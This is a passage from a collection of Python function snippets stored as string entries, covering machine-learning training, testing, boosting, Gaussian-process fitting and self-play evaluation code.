validation_errors.append(np.mean(validation_errors_stats))\n \n if val:\n accuracy = model.validate(val) * 100.0\n print(\"Epoch {0}, accuracy {1} %.\".format(e + 1, accuracy))\n model.validation_acc.append(accuracy)\n else:\n print(\"Processed epoch {0}.\".format(e))\n\n\n # Cleanup ...\n model.eval()\n\n seed = np.random.randint(123)\n np.random.seed(seed)\n np.random.shuffle(testx)\n np.random.seed(seed)\n np.random.shuffle(testy) \n\n for b in range(0, len(testx), batch_size):\n\n # Test ...\n x_batch = testx[b:b + batch_size]\n y_batch = testy[b:b + batch_size]\n\n model.zero_grads()\n preds = model.forward(x_batch)\n model.backward(y_batch)\n loss = model.criterion(model.inputs[-1], y_batch)\n\n answers = np.argmax(preds, axis=1)\n labels = np.argmax(y_batch, axis=0)\n error = len(answers[answers!=labels]) / len(answers)\n\n test_losses.append(loss)\n test_errors.append(error)\n\n # Return results ...\n return (training_losses, training_errors, validation_losses, validation_errors)", "def ComputeNrb(self):\r\n pass", "def update_bn_stats(\n model: nn.Module,\n data_loader: Iterable[Any],\n num_iters: int = 200,\n by_epoch: bool = False):\n bn_layers = get_bn_modules(model)\n\n if len(bn_layers) == 0:\n return\n\n momentum_actual = [bn.momentum for bn in bn_layers]\n for bn in bn_layers:\n bn.momentum = 1.0\n\n running_mean = [\n torch.zeros_like(bn.running_mean) for bn in bn_layers\n ]\n running_var = [torch.zeros_like(bn.running_var) for bn in bn_layers]\n\n if by_epoch:\n num_iters = num_iters * len(data_loader)\n\n iter_loader = IterLoader(data_loader)\n ind = -1\n with tqdm(total=num_iters) as pbar:\n pbar.set_description('Calculating running stats')\n while ind < num_iters:\n data_batch = next(iter_loader)\n output = model(data_batch['img'])\n\n ind += 1\n for i, bn in enumerate(bn_layers):\n running_mean[i] += (bn.running_mean - running_mean[i]) / (ind + 1)\n running_var[i] += (bn.running_var - running_var[i]) / (ind + 1)\n\n pbar.update(1)\n\n assert ind == num_iters, (\n \"update_bn_stats is meant to run for {} iterations, \"\n \"but the dataloader stops at {} iterations.\".format(num_iters, ind)\n )\n\n for i, bn in enumerate(bn_layers):\n bn.running_mean = running_mean[i]\n bn.running_var = running_var[i]\n bn.momentum = momentum_actual[i]", "def test_Bernoulli_NB_estimators():", "def test_GNB():\n gnb = GNB()\n n = 10\n nclasses = 2\n nfeatures = 4\n means = (np.tile(10**np.arange(nfeatures), (nclasses, 1))\n * np.arange(1, nclasses+1)[:,None])\n sds = (np.tile(.1**(np.arange(nfeatures)), (nclasses, 1))\n * np.arange(1, nclasses+1)[:, None])\n\n x = np.concatenate(np.random.normal(means, sds, (n // nclasses, *means.shape)))\n y = np.tile(np.arange(nclasses), n // nclasses)\n\n gnb.fit(x, y)\n pred = gnb.predict(x)\n\n print(gnb.means.shape, means.shape)\n print(gnb.sds.shape, sds.shape)\n\n print('comparing mean estimates')\n print('========================')\n print(gnb.means - means)\n print(f'largest difference = {np.max(np.abs(gnb.means - means)):.3f}')\n\n print('\\ncomparing sd estimates')\n print('======================')\n print(gnb.sds - sds)\n print(f'largest difference = {np.max(np.abs(gnb.sds - sds)):.3f}')\n\n print('\\ncomparing predictions')\n print('=====================')\n print(y - pred)\n print(f'largest difference = {np.max(np.abs(pred - y)):.3f}')\n\n\n preds = modeltest(gnb, x, y, x)\n assert np.all(preds == y)", "def run(self):\n if self.pb.xvalEN and not self.isXvalMain:\n dt = np.ones(self.pb.total_exam_no,\n dtype=\"float32\") / 
self.train_exam_no\n dt[self.val_indices] = 0.0\n else:\n dt = np.ones(self.pb.total_exam_no,\n dtype=\"float32\") / self.pb.total_exam_no\n\n val = np.zeros(8,dtype=\"float32\")-1\n boosting = None\n wl = None\n if self.pb.algorithm == 'conf-rated':\n boosting = ConfidenceRated(self)\n wl = ConfidenceRatedWL(self)\n elif self.pb.algorithm == 'adaboost':\n boosting = AdaBoost(self)\n wl = AdaBoostWL(self)\n elif self.pb.algorithm == 'adaboost-fast':\n boosting = AdaBoostFast(self)\n wl = AdaBoostFastWL(self)\n elif self.pb.algorithm == 'rankboost':\n boosting = RankBoost(self)\n wl = ConfidenceRatedWL(self)\n elif self.pb.algorithm == 'rankboost-fast':\n boosting = RankBoost(self)\n wl = AdaBoostFastWL(self)\n else:\n raise Exception(\"Unknown Boosting Algorithm\")\n \n for r in range(self.pb.rounds):\n tree = wl.run(dt)\n dt = boosting.run(dt = dt,\n r = r,\n tree = tree)\n \n if self.isXvalMain:\n boosting.finalize()\n \n \"\"\"Sync the predictions and save them to a file\"\"\"\n if self.pb.isLeader:\n if self.pb.xvalEN and not self.isXvalMain:\n val_predictions = boosting.get_val_predictions()\n hypotheses = boosting.get_hypotheses()\n np.savez(self.out_fp,\n val_predictions = val_predictions,\n hypotheses = hypotheses,\n )\n if self.pb.testEN and self.isXvalMain:\n train_predictions = boosting.get_train_predictions()\n test_predictions = boosting.get_test_predictions()\n hypotheses = boosting.get_hypotheses()\n np.savez(self.out_fp,\n train_predictions = train_predictions,\n test_predictions = test_predictions,\n hypotheses = hypotheses,\n )\n if not self.pb.testEN and self.isXvalMain:\n train_predictions = boosting.get_train_predictions()\n hypotheses = boosting.get_hypotheses()\n np.savez(self.out_fp,\n train_predictions = train_predictions,\n hypotheses = hypotheses,\n )", "def run(self):\n if self.pb.xvalEN and not self.isXvalMain:\n dt = np.ones(self.pb.total_exam_no,\n dtype=\"float32\") / self.train_exam_no\n dt[self.val_indices] = 0.0\n else:\n dt = np.ones(self.pb.total_exam_no,\n dtype=\"float32\") / self.pb.total_exam_no\n\n val = np.zeros(8,dtype=\"float32\")-1\n boosting = None\n wl = None\n if self.pb.algorithm == 'conf-rated':\n boosting = ConfidenceRated(self)\n wl = ConfidenceRatedWL(self)\n elif self.pb.algorithm == 'adaboost':\n boosting = AdaBoost(self)\n wl = AdaBoostWL(self)\n elif self.pb.algorithm == 'adaboost-fast':\n boosting = AdaBoostFast(self)\n wl = AdaBoostFastWLMPI(self)\n elif self.pb.algorithm == 'rankboost':\n boosting = RankBoost(self)\n wl = ConfidenceRatedWL(self)\n elif self.pb.algorithm == 'rankboost-fast':\n boosting = RankBoost(self)\n wl = AdaBoostFastWL(self)\n else:\n raise Exception(\"Unknown Boosting Algorithm\")\n \n for r in range(self.pb.rounds):\n tree = wl.run(dt)\n dt = boosting.run(dt = dt,\n r = r,\n tree = tree)\n \n if self.isXvalMain:\n boosting.finalize()\n \n \"\"\"Sync the predictions and save them to a file\"\"\"\n if self.pb.isLeader:\n if self.pb.xvalEN and not self.isXvalMain:\n val_predictions = boosting.get_val_predictions()\n hypotheses = boosting.get_hypotheses()\n np.savez(self.out_fp,\n val_predictions = val_predictions,\n hypotheses = hypotheses,\n )\n if self.pb.testEN and self.isXvalMain:\n train_predictions = np.zeros([self.pb.total_exam_no,self.pb.rounds],\n dtype=\"float32\")\n test_predictions = np.zeros([self.pb.test_exam_no,self.pb.rounds],\n dtype=\"float32\")\n for slv in np.arange(self.pb.comm_size):\n tr_i1 = self.pb.train_partition[slv]\n tr_i2 = self.pb.train_partition[slv+1]\n te_i1 = 
self.pb.test_partition[slv]\n te_i2 = self.pb.test_partition[slv+1]\n if slv == 0:\n train_predictions[tr_i1:tr_i2,:] = boosting.get_train_predictions()\n test_predictions[te_i1:te_i2,:] = boosting.get_test_predictions()\n else:\n train_predictions[tr_i1:tr_i2,:] = self.pb.comm.recv(source=slv,tag=11)\n test_predictions[te_i1:te_i2,:] = self.pb.comm.recv(source=slv,tag=12)\n hypotheses = boosting.get_hypotheses()\n np.savez(self.out_fp,\n train_predictions = train_predictions,\n test_predictions = test_predictions,\n hypotheses = hypotheses,\n )\n if not self.pb.testEN and self.isXvalMain:\n train_predictions = np.zeros([self.pb.total_exam_no,self.pb.rounds],\n dtype=\"float32\")\n for slv in np.arange(self.pb.comm_size):\n tr_i1 = self.pb.train_partition[slv]\n tr_i2 = self.pb.train_partition[slv+1]\n if slv == 0:\n train_predictions[tr_i1:tr_i2,:] = boosting.get_train_predictions()\n else:\n train_predictions[tr_i1:tr_i2,:] = self.pb.comm.recv(source=slv,tag=11)\n hypotheses = boosting.get_hypotheses()\n np.savez(self.out_fp,\n train_predictions = train_predictions,\n hypotheses = hypotheses,\n )\n else:\n if self.pb.testEN and self.isXvalMain:\n train_predictions = boosting.get_train_predictions()\n self.pb.comm.send(train_predictions,dest = 0,tag=11)\n test_predictions = boosting.get_test_predictions()\n self.pb.comm.send(test_predictions,dest = 0,tag=12)\n if not self.pb.testEN and self.isXvalMain:\n train_predictions = boosting.get_train_predictions()\n self.pb.comm.send(train_predictions,dest = 0,tag=11)", "def compute_probabilities():\n global total_spam_words, total_ham_words\n total_words = total_spam_words+total_ham_words\n unique_words = len(all_dict)\n print(\"Training Set Description: \")\n len_ham = len(ham_file_list)\n len_spam = len(spam_file_list)\n print(\"SPAM EMAILS: \",len_spam)\n print(\"HAM EMAILS: \",len_ham)\n print(\"Total words: \",total_words)\n print(\"Training...\")\n \n spam_probability = math.log((len_spam)/(len_spam+len_ham))\n ham_probability = math.log((len_ham)/(len_spam+len_ham))\n \n \n \n output_file = open(\"nbmodel.txt\", \"w+\", encoding=\"latin-1\")\n output_file.write(\"model_params \"+str(spam_probability)+\" \"+str(ham_probability)+\"\\n\")\n \n nbmodel = {}\n nbmodel[\"model_params\"] = (spam_probability,ham_probability)\n for word in all_dict.keys():\n spam_count = 1\n if word in spam_dict:\n spam_count+= spam_dict[word]\n \n word_spam_probability = math.log(spam_count / (total_spam_words+unique_words))\n \n ham_count = 1\n if word in ham_dict:\n ham_count+= ham_dict[word]\n \n word_ham_probability = math.log(ham_count / (total_ham_words+unique_words))\n \n output_file.write(word+\" \"+str(word_spam_probability)+\" \"+str(word_ham_probability)+\"\\n\")\n nbmodel[word] = (word_spam_probability, word_ham_probability) \n \n print(\"nbmodel.txt generated successfully...\")\n print(\"SPAM Probability: \",spam_probability)\n print(\"HAM Probability: \",ham_probability)\n output_file.close()", "def fit(self, Y, STATUS, ntop=100, nrecent=100, nmax=400, ntopmu=100, ntopvar=100, nkmeans=300, nkeamnsdata=5000,\n lam=1e-6):\n X = self.X\n untested = [i for i in range(self.n) if STATUS[i] == 0]\n tested = [i for i in range(self.n) if STATUS[i] == 2]\n ytested = Y[tested].reshape(-1)\n self.y_max = np.max(ytested)\n # each 10 fits we update the hyperparameters, otherwise we just update the data which is a lot faster\n if np.mod(self.update_counter, self.updates_per_big_fit) == 0:\n print('fitting hyperparameters')\n # how many training points are there\n 
ntested = len(tested)\n # if more than nmax we will subsample and use the subsample to fit hyperparametesr\n if ntested > nmax:\n # subsample is uniion of 100 best points, 100 most recent points and then random points \n top = list(np.argsort(ytested)[-ntop:])\n recent = list(range(ntested - nrecent, ntested))\n topandrecent = list(set(top + recent))\n rand = list(\n np.random.choice([i for i in range(ntested) if i not in topandrecent], nmax - len(topandrecent),\n False))\n testedtrain = topandrecent + rand\n ytrain = ytested[testedtrain]\n train = [tested[i] for i in testedtrain]\n else:\n train = tested\n ytrain = ytested\n \n # use GPy code to fit hyperparameters to minimize NLL on train data\n mfy = GPy.mappings.Constant(input_dim=self.d, output_dim=1) # fit dense GPy model to this data\n ky = GPy.kern.RBF(self.d, ARD=True, lengthscale=np.ones(self.d))\n self.GP = GPy.models.GPRegression(X[train], ytrain.reshape(-1, 1), kernel=ky, mean_function=mfy)\n self.GP.optimize('bfgs')\n # strip out fitted hyperparameters from GPy model, because cant do high(ish) dim sparse inference\n self.mu = self.GP.flattened_parameters[0]\n self.a = self.GP.flattened_parameters[1]\n self.l = self.GP.flattened_parameters[2]\n self.b = self.GP.flattened_parameters[3]\n # selecting inducing points for sparse inference \n print('selecting inducing points')\n # get prediction from GPy model \n self.py = self.GP.predict(X)\n # points with 100 highest means\n topmu = [untested[i] for i in np.argsort(self.py[0][untested].reshape(-1))[-ntopmu:]]\n # points with 100 highest uncertatinty\n topvar = [untested[i] for i in np.argsort(self.py[1][untested].reshape(-1))[-ntopvar:]]\n # combine with train set above to give nystrom inducing points (inducing points that are also actual trainingdata points) \n nystrom = topmu + topvar + train\n # also get some inducing points spread throughout domain by using kmeans\n # kmeans is very slow on full dataset so choose random subset \n # also scale using length scales l so that kmeans uses approproate distance measure\n kms = KMeans(n_clusters=nkmeans, max_iter=5).fit(\n np.divide(X[list(np.random.choice(untested, nkeamnsdata))], self.l))\n # matrix of inducing points \n self.M = np.vstack((X[nystrom], np.multiply(kms.cluster_centers_, self.l)))\n # dragons...\n # email james.l.hook@gmail.com if this bit goes wrong!\n print('fitting sparse model')\n DXM = euclidean_distances(np.divide(X, self.l), np.divide(self.M, self.l), squared=True)\n self.SIG_XM = self.a * np.exp(-DXM / 2)\n DMM = euclidean_distances(np.divide(self.M, self.l), np.divide(self.M, self.l), squared=True)\n self.SIG_MM = self.a * np.exp(-DMM / 2) + np.identity(self.M.shape[0]) * lam * self.a\n self.B = self.a + self.b - np.sum(np.multiply(np.linalg.solve(self.SIG_MM, self.SIG_XM.T), self.SIG_XM.T),0)\n K = np.matmul(self.SIG_XM[tested].T, np.divide(self.SIG_XM[tested], self.B[tested].reshape(-1, 1)))\n self.SIG_MM_pos = self.SIG_MM - K + np.matmul(K, np.linalg.solve(K + self.SIG_MM, K))\n J = np.matmul(self.SIG_XM[tested].T, np.divide(ytested - self.mu, self.B[tested]))\n self.mu_M_pos = self.mu + J - np.matmul(K, np.linalg.solve(K + self.SIG_MM, J))\n else:\n K = np.matmul(self.SIG_XM[tested].T, np.divide(self.SIG_XM[tested], self.B[tested].reshape(-1, 1)))\n self.SIG_MM_pos = self.SIG_MM - K + np.matmul(K, np.linalg.solve(K + self.SIG_MM, K))\n J = np.matmul(self.SIG_XM[tested].T, np.divide(ytested - self.mu, self.B[tested]))\n self.mu_M_pos = self.mu + J - np.matmul(K, np.linalg.solve(K + self.SIG_MM, J))\n 
self.update_counter += 1\n \"\"\" \n key attributes updated by fit \n \n self.SIG_XM : prior covarience matrix between data and inducing points\n self.SIG_MM : prior covarience matrix at inducing points\n \n self.SIG_MM_pos : posterior covarience matrix at inducing points\n self.mu_M_pos : posterior mean at inducing points \n \n \"\"\"", "def compute_statistics(self):", "def _calculateIterations(self):\n #iterations = self.nb_images/self.batchsize\n imgs = self.protofile.nb_test()\n batch = self.protofile.batch_test()\n iterations = imgs/batch\n if imgs % batch != 0:\n iterations += 1\n return iterations", "def test_model(all_data):\n nll = 0\n xent = 0\n step = 0\n for data in jsb.batch_iterator(all_data, FLAGS.batch_size, FLAGS.sequence_length):\n feed = fill_feed(inputs, targets, data)\n\n batch_xent, batch_nll = sess.run([loss_op, nll_op],\n feed_dict=feed)\n\n xent += batch_xent\n nll += batch_nll\n step += 1\n return xent/step, nll/step", "def ann_learning_curve(trainx, trainy, testx, testy, n_hidden=[5, 3],\n\t\t\t\t\t\tn_iter=5, cv=5, train_sizes=np.linspace(.1, 1.0, 10)):\n\n\tcv_train_scores = [[0] * len(train_sizes)]\n\tcv_test_scores = [[0] * len(train_sizes)]\n\tfor c in range(cv):\n\t\ttrain_scores = []\n\t\ttest_scores = []\n\t\tfor ts in train_sizes:\n\t\t\tn_examples = int(round(len(trainx) * ts))\n\t\t\trows = random.sample(range(len(trainx)), n_examples)\n\t\t\tsubx = trainx.iloc[rows, ]\n\t\t\tsuby = trainy.iloc[rows, ]\n\t\t\tstart = time.time()\n\t\t\ta, b = test_ann2(subx, suby, testx, testy,\n\t\t\t\t\t\t\t\tn_hidden=n_hidden, n_iter=n_iter)\n\t\t\tprint(\"training time: {} secs\".format(time.time() - start))\n\t\t\tcurrent_train_score = a\n\t\t\tcurrent_test_score = b\n\t\t\ttrain_scores.append(current_train_score)\n\t\t\ttest_scores.append(current_test_score)\n\t\tcv_train_scores.append(train_scores)\n\t\tcv_test_scores.append(test_scores)\n\taverage_train_scores = [sum(i) / cv for i in zip(*cv_train_scores)]\n\taverage_test_scores = [sum(i) / cv for i in zip(*cv_test_scores)]\n\treturn train_sizes, average_train_scores, average_test_scores", "def sgd(self,\n batch_size=36,\n epsilon=0.16 ,\n epochs=30):\n \n # Compute the number of training examples and number of mini-batches.\n N = min(len(self.trainX), len(self.trainY))\n num_batches = int(N/batch_size)\n\n # Variables to keep track of statistics\n loss_log = []\n test_acc_log = []\n train_acc_log = []\n\n timestamp = time.time()\n timestamp2 = time.time()\n\n predictions_not_shown = True\n \n \n # In each \"epoch\", the network is exposed to the entire training set.\n for t in range(epochs):\n\n # We will order the training data using a random permutation.\n permutation = np.random.permutation(N)\n \n # Evaluate the accuracy on 1000 samples from the training and test data\n test_acc_log.append( self.evaluate(self.testX, self.testY, 1000) )\n print(t)\n print(test_acc_log[t])\n \n if test_acc_log[t]>=0.869:\n break\n \n train_acc_log.append( self.evaluate(self.trainX, self.trainY, 1000))\n print(train_acc_log[t])\n batch_loss = 0\n\n for k in range(num_batches):\n \n # Reset buffer containing updates\n # TODO\n \n # Mini-batch loop\n \n dc_dw = [i*0 for i in self.dw]\n dc_db = [i*0 for i in self.db]\n for i in range(batch_size):\n\n # Select the next training example (x,y)\n x = self.trainX[permutation[k*batch_size+i]]\n y = self.trainY[permutation[k*batch_size+i]]\n\n # Feed forward inputs\n # TODO\n self.forward(x)\n # Compute gradients\n # TODO\n self.backward(x,y)\n \n for l in range(self.L):\n dc_dw[l] 
=dc_dw[l]+ self.dw[l]\n dc_db[l] =dc_db[l]+ self.db[l] \n\n # Update loss log\n batch_loss += self.loss(self.a[self.L-1], y)\n\n for l in range(self.L):\n self.batch_a[l] += self.a[l] / batch_size\n \n # Update the weights at the end of the mini-batch using gradient descent\n \n \n for l in range(1,self.L):\n \n self.w[l] -=epsilon *(dc_dw[l]/batch_size)\n \n self.b[l] -=epsilon *(dc_db[l]/batch_size)\n \n # Update logs\n loss_log.append( batch_loss / batch_size )\n batch_loss = 0\n \n # Update plot of statistics every 10 seconds.\n if time.time() - timestamp > 10:\n timestamp = time.time()\n fnn_utils.plot_stats(self.batch_a,\n loss_log,\n test_acc_log,\n train_acc_log)\n\n # Display predictions every 20 seconds.\n if (time.time() - timestamp2 > 20) or predictions_not_shown:\n predictions_not_shown = False\n timestamp2 = time.time()\n fnn_utils.display_predictions(self,show_pct=True)\n\n # Reset batch average\n for l in range(self.L):\n self.batch_a[l].fill(0.0)\n return test_acc_log[t-1]", "def calculate_statistics(train_loader, net):\n net.eval()\n\n pred_list = None\n max_class_mean = {}\n print(\"Calculating statistics...\")\n for i, data in enumerate(train_loader):\n inputs = data[0]\n\n inputs = inputs.cuda()\n B, C, H, W = inputs.shape\n batch_pixel_size = C * H * W\n\n with torch.no_grad():\n outputs, _ = net(inputs)\n\n if pred_list is None:\n pred_list = outputs.data.cpu()\n else:\n pred_list = torch.cat((pred_list, outputs.cpu()), 0)\n del outputs\n\n if i % 50 == 49 or i == len(train_loader) - 1:\n pred_list = pred_list.transpose(1, 3)\n pred_list, prediction = pred_list.max(3)\n\n class_max_logits = []\n mean_dict, var_dict = {}, {}\n for c in range(datasets.num_classes):\n max_mask = pred_list[prediction == c]\n class_max_logits.append(max_mask)\n\n mean = class_max_logits[c].mean(dim=0)\n var = class_max_logits[c].var(dim=0)\n\n mean_dict[c] = mean.item()\n var_dict[c] = var.item()\n\n print(f\"class mean: {mean_dict}\")\n print(f\"class var: {var_dict}\")\n np.save(f'stats/{args.dataset[0]}_mean.npy', mean_dict)\n np.save(f'stats/{args.dataset[0]}_var.npy', var_dict)\n\n return None", "def epoch_diagnostics(self, train_loss, train_err, test_loss, test_err):\n m = self.nbatches\n logging.info(\"Epoch diagnostics computation\")\n\n layernum = 0\n layer_gradient_norm_sqs = []\n gavg_norm_acum = 0.0\n gavg_acum = []\n for group in self.param_groups:\n for p in group['params']:\n\n layer_gradient_norm_sqs.append([])\n gavg = self.state[p]['gavg'].cpu()\n gavg_acum.append(gavg.numpy())\n gavg_norm_acum += gavg.norm()**2 #torch.dot(gavg, gavg)\n layernum += 1\n\n gradient_norm_sqs = []\n vr_step_variance = []\n cos_acums = []\n variances = []\n\n for batch_id in range(m):\n norm_acum = 0.0\n ginorm_acum = 0.0\n vr_acum = 0.0\n layernum = 0\n cos_acum = 0.0\n var_acum = 0.0\n for group in self.param_groups:\n for p in group['params']:\n param_state = self.state[p]\n\n gktbl = param_state['gktbl']\n gavg = param_state['gavg'].type_as(p.data).cpu()\n\n gi = gktbl[batch_id, :]\n var_norm_sq = (gi-gavg).norm()**2 #torch.dot(gi-gavg, gi-gavg)\n norm_acum += var_norm_sq\n ginorm_acum += gi.norm()**2 #torch.dot(gi, gi)\n layer_gradient_norm_sqs[layernum].append(var_norm_sq)\n\n gktbl_old = param_state['gktbl_old']\n gavg_old = param_state['gavg_old'].type_as(p.data).cpu()\n gi_old = gktbl_old[batch_id, :]\n #pdb.set_trace()\n vr_step = gi - gi_old + gavg_old\n vr_acum += (vr_step - gavg).norm()**2 #torch.dot(vr_step - gavg, vr_step - gavg)\n cos_acum += torch.sum(gavg*gi)\n\n var_acum += 
(gi - gavg).norm()**2\n\n layernum += 1\n gradient_norm_sqs.append(norm_acum)\n vr_step_variance.append(vr_acum)\n cosim = cos_acum/math.sqrt(ginorm_acum*gavg_norm_acum)\n #pdb.set_trace()\n cos_acums.append(cosim)\n variances.append(var_acum)\n\n variance = sum(variances)/len(variances)\n\n print(\"mean cosine: {}\".format(sum(cos_acums)/len(cos_acums)))\n\n #pdb.set_trace()\n\n with open('stats/{}fastdiagnostics_epoch{}.pkl'.format(self.test_name, self.epoch), 'wb') as output:\n pickle.dump({\n 'train_loss': train_loss,\n 'train_err': train_err,\n 'test_loss': test_loss,\n 'test_err': test_err,\n 'epoch': self.epoch,\n #'layer_gradient_norm_sqs': layer_gradient_norm_sqs,\n #'gradient_norm_sqs': gradient_norm_sqs,\n #'vr_step_variance': vr_step_variance,\n #'cosine_distances': cos_acums,\n #'variances': variances,\n 'variance': variance,\n #'gavg_norm': gavg_norm_acum,\n #'gavg': gavg_acum,\n #'iterate_distances': self.inrun_iterate_distances,\n #'grad_distances': self.inrun_grad_distances,\n }, output)\n print(\"Epoch diagnostics saved\")\n #pdb.set_trace()\n\n self.inrun_iterate_distances = []\n self.inrun_grad_distances = []", "def measure_rate(net, n_samples=10):\n from scipy.stats import multivariate_normal as mn\n\n dataset_dir, dataset_pth = make_dataset_pths(net)\n print(\"dataset path: \", dataset_pth)\n X, Probes, Change_prob, Perceptual_dist = load_or_make_dataset(\n net, dataset_pth, dataset_dir, net.dataset_size)\n Rx = []\n mu, logsigma = [], []\n i = 0\n while True:\n if i * net.batch_size > len(X) - 1:\n break\n x = X[i * net.batch_size:(i + 1) * net.batch_size]\n m, ls = net.encode_presample(x, keep_session=True)\n mu.append(m)\n logsigma.append(ls)\n i += 1\n mu = np.vstack(mu)\n logsigma = np.vstack(logsigma)\n print(\"Dataset encoded.\")\n z = [\n mn.rvs(mean=mu[j], cov=np.diag(np.exp(logsigma[j])), size=n_samples)\n for j in range(len(mu))\n ]\n p_z_given_x = [\n mn.logpdf(z[j], mean=mu[j], cov=np.diag(np.exp(logsigma[j])))\n for j in range(len(mu))\n ]\n m_z = [\n mn.logpdf(\n z[j], mean=np.zeros(net.latent_size), cov=np.eye(net.latent_size))\n for j in range(len(mu))\n ]\n Rx = [(p_z_given_x[j] - m_z[j]).sum() / n_samples for j in range(len(mu))]\n R = sum(Rx) / len(X)\n print(R)\n return R", "def learn(self):\n epochswin = [] # count the number of wins at every epoch of the network against the preceding version\n epochdraw = [] # count the number of draws at every epoch of the network against the preceding version\n epochswingreedy = [] # count the number of wins against greedy at every epoch\n epochswinrandom = [] # count the number of wins against random at every epoch\n epochsdrawgreedy = [] # count the number of draws against greedy at every epoch\n epochsdrawrandom = [] # count the number of wins against random at every epoch\n epochswinminmax = [] # count the number of wins against minmax at every epoch\n epochsdrawminmax = [] # count the number of draws against minmax at every epoch\n\n\n if self.args.load_model == True:\n file = open(self.args.trainExampleCheckpoint + \"graphwins:iter\" + str(self.args.numIters) + \":eps\" + str(\n self.args.numEps) + \":dim\" + str(self.game.n) + \".txt\", \"r+\")\n lines = file.readlines()\n for index, line in enumerate(lines):\n for word in line.split():\n if index == 0:\n epochswin.append(word)\n elif index == 1:\n epochdraw.append(word)\n file.close()\n\n file = open(self.args.trainExampleCheckpoint + \"graphwins:iter\" + str(self.args.numIters) + \":eps\" + str(\n self.args.numEps) + \":dim\" + str(self.game.n) + 
\":greedyrandom.txt\", \"r+\")\n lines = file.readlines()\n for index, line in enumerate(lines):\n for word in line.split():\n if index == 0:\n epochswingreedy.append(word)\n elif index == 1:\n epochsdrawgreedy.append(word)\n elif index == 2:\n epochswinrandom.append(word)\n elif index == 3:\n epochsdrawrandom.append(word)\n elif index == 4:\n epochswinminmax.append(word)\n elif index == 5:\n epochsdrawminmax.append(word)\n file.close()\n self.loadTrainExamples()\n\n for i in range(1, self.args.numIters + 1):\n # bookkeeping\n print('------ITER ' + str(i) + '------')\n # examples of the iteration\n iterationTrainExamples = deque([], maxlen=self.args.maxlenOfQueue)\n\n eps_time = AverageMeter()\n bar = Bar('Self Play', max=self.args.numEps)\n end = time.time()\n\n for eps in range(self.args.numEps):\n iterationTrainExamples += self.executeEpisode()\n\n # bookkeeping + plot progress\n eps_time.update(time.time() - end)\n end = time.time()\n bar.suffix = '({eps}/{maxeps}) Eps Time: {et:.3f}s | Total: {total:} | ETA: {eta:}'.format(eps=eps + 1,\n maxeps=self.args.numEps,\n et=eps_time.avg,\n total=bar.elapsed_td,\n eta=bar.eta_td)\n bar.next()\n bar.finish()\n\n # save the iteration examples to the history\n self.trainExamplesHistory.append(iterationTrainExamples)\n\n if len(self.trainExamplesHistory) > self.args.numItersForTrainExamplesHistory:\n print(\"len(trainExamplesHistory) =\", len(self.trainExamplesHistory),\n \" => remove the oldest trainExamples\")\n self.trainExamplesHistory.pop(0)\n # backup history to a file\n # NB! the examples were collected using the model from the previous iteration, so (i-1)\n self.saveTrainExamples(i - 1)\n\n # shuffle examlpes before training\n trainExamples = []\n for e in self.trainExamplesHistory:\n trainExamples.extend(e)\n shuffle(trainExamples)\n\n # training new network, keeping a copy of the old one\n\n filename = \"curent\"+str(i)+\"temp:iter\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n filenameBest = \"best\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=filename)\n exists = os.path.isfile(filenameBest)\n if exists:\n self.pnet.load_checkpoint(folder=self.args.checkpoint, filename=filenameBest)\n else:\n self.pnet.load_checkpoint(folder=self.args.checkpoint, filename=filename)\n pmcts = MCTS(self.game, self.pnet, self.args)\n\n self.nnet.train(trainExamples)\n nmcts = MCTS(self.game, self.nnet, self.args)\n\n print('PITTING AGAINST PREVIOUS VERSION')\n arena = Arena(lambda x: np.argmax(pmcts.getActionProb(x, temp=0)),\n lambda x: np.argmax(nmcts.getActionProb(x, temp=0)), self.game,nmcts,pmcts,evaluate=True)\n\n pwins, nwins, draws = arena.playGames(self.args.arenaCompare, False)\n\n pmcts.clear()\n nmcts.clear()\n del pmcts\n del nmcts\n\n print(' ')\n print('NEW/PREV WINS : %d / %d ; DRAWS : %d' % (nwins, pwins, draws))\n if i == 1:\n epochswin.append(pwins)\n epochdraw.append(0)\n\n epochswin.append(nwins)\n epochdraw.append(draws)\n self.writeLogsToFile(epochswin, epochdraw)\n\n ''' Get all the players and then pit them against the network. 
You need to modify here if you implement \n more players\n '''\n (gp, rp, mp) = self.decidePlayers()\n\n if self.args.parallel == 0:\n\n\n nmcts1 = MCTS(self.game, self.nnet, self.args)\n nmcts2 = MCTS(self.game, self.nnet, self.args)\n nmcts3 = MCTS(self.game, self.nnet, self.args)\n\n arenagreedy = Arena(lambda x: np.argmax(nmcts1.getActionProb(x, temp=0)), gp, self.game,nmcts1)\n arenarandom = Arena(lambda x: np.argmax(nmcts2.getActionProb(x, temp=0)), rp, self.game,nmcts2)\n arenaminmax = Arena(lambda x: np.argmax(nmcts3.getActionProb(x, temp=0)), mp, self.game,nmcts3,evaluate=True)\n\n pwinsminmax, nwinsminmax, drawsminmax = arenaminmax.playGames(self.args.arenaCompare)\n print(\"minmax - \"+str(pwinsminmax)+\" \"+str(nwinsminmax)+\" \"+str(drawsminmax))\n pwinsgreedy, nwinsgreedy, drawsgreedy = arenagreedy.playGames(self.args.arenaCompare)\n print(\"greedy - \"+str(pwinsgreedy)+\" \"+str(nwinsgreedy)+\" \"+str(drawsgreedy))\n pwinsreandom, nwinsrandom, drawsrandom = arenarandom.playGames(self.args.arenaCompare)\n print(\"random - \"+str(pwinsreandom)+\" \"+str(nwinsrandom)+\" \"+str(drawsrandom))\n\n nmcts1.clear()\n nmcts2.clear()\n nmcts3.clear()\n del nmcts1\n del nmcts2\n del nmcts3\n\n else:\n '''\n This will be used if you want to evaluate the network against the benchmarks in a parallel way\n '''\n\n self.args.update({'index': str(i)})\n\n p = self.parallel(self.args.arenaCompare)\n (pwinsminmax, nwinsminmax, drawsminmax) = p[0] # self.parallel(\"minmax\", self.args.arenaCompare)\n (pwinsgreedy, nwinsgreedy, drawsgreedy) = p[1] # self.parallel(\"greedy\",self.args.arenaCompare)\n (pwinsreandom, nwinsrandom, drawsrandom) = p[2] # self.parallel(\"random\",self.args.arenaCompare)\n\n epochsdrawgreedy.append(drawsgreedy)\n epochsdrawrandom.append(drawsrandom)\n epochswinrandom.append(pwinsreandom)\n epochswingreedy.append(pwinsgreedy)\n epochswinminmax.append(pwinsminmax)\n epochsdrawminmax.append(drawsminmax)\n\n self.writeLogsToFile(epochswingreedy, epochsdrawgreedy, epochswinrandom, 